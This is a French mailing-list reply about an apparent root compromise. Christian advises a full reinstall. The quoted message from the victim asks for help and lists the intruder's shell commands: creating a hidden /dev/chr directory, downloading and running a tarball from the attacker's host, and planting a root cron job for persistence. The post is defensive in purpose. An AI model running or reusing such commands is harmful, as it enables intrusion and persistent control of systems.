[Précédent (date)] [Suivant (date)] [Précédent (sujet)] [Suivant (sujet)] [Index par date] [Index par sujet]

Re: Hacking, en suis-je victime??



Salut,

Cet individu a eu l'accès à root sur ton système. Autant dire qu'il
pouvait faire  ce qu'il voulait. Quand root est compromis il n'y a pas
36 solutions: il faut tout réinstaller. N'importe lequel des programmes
a pu être remplacé par un 'clone'.

Christian


Daniel Chenard a écrit :
> 
> Hep, je sais que mon système n'est pas inviolable mais bon...
> Je sais aussi que si quelqu'un me hack que je dois mieux me protéger...
> ce que je comprends pas, comment a-t-il fait pour installer un prog sous
> mon username???
> 
> le point 2
> Je dois dire que oui il y a une fièreté personnel de rentrer sur un
> ordi, on peut y glisser un mot, un fichier et dire:   "Coucou!!!
> Vérifie la sécurité de ton système, il y a des trous!!!"  Soit, si
> seulement ce serait que cette en garde mais ce n'est pas le cas!!
> il l'a installer et foutu un cron sur celui ci
> 
> Ce qui m'inquiète, c'est que ce prog contient des ".h" telque icmp.h,
> ip.h bref je sais pas a quoi ca rime mais j'aimerais savoir!!!
> 
> S'il y a un gars fort en programation socket et qui peut me dire a quoi
> ca rime je vous en remerci!!
> Et oui je sais qui a fait le coup, j'ai son adresse ip et son
> username... il semble avoir une
> connection permanente..
> 
> Mais bref, pour tout vous dire, JE N'AIME PAS CA DU TOUT!!
> Et oui je vous permet de rire de moi ;-p
> 
> si vous pouver me venir en aide et bien je vous remerci!!!
> 
> ------------------
> ici les commandes faite par la personne
> ------------------
> mkdir /dev/chr ;cd /dev/chr ;ncftpget -u username_du_gars -p password_du_gars son_adresse_ip . a.tar.gz ;tar zxvf a.tar.gz ;rm -rf *.gz ;cd client ;./td
> ps aux
> echo "0,10,20,30,40,50 * * * * /dev/chr/client/td >/dev/null 2>&1" >> cron ;crontab -u root /dev/chr/client/cron
> ps aux
> -------------
> 
> J'aimerais vous fournir le a.tar.gz ainsi que le newstachel.tar.gz
> mais je ne peux pas avec ce truc via le web ..:-(
> 
> Merci encore!!!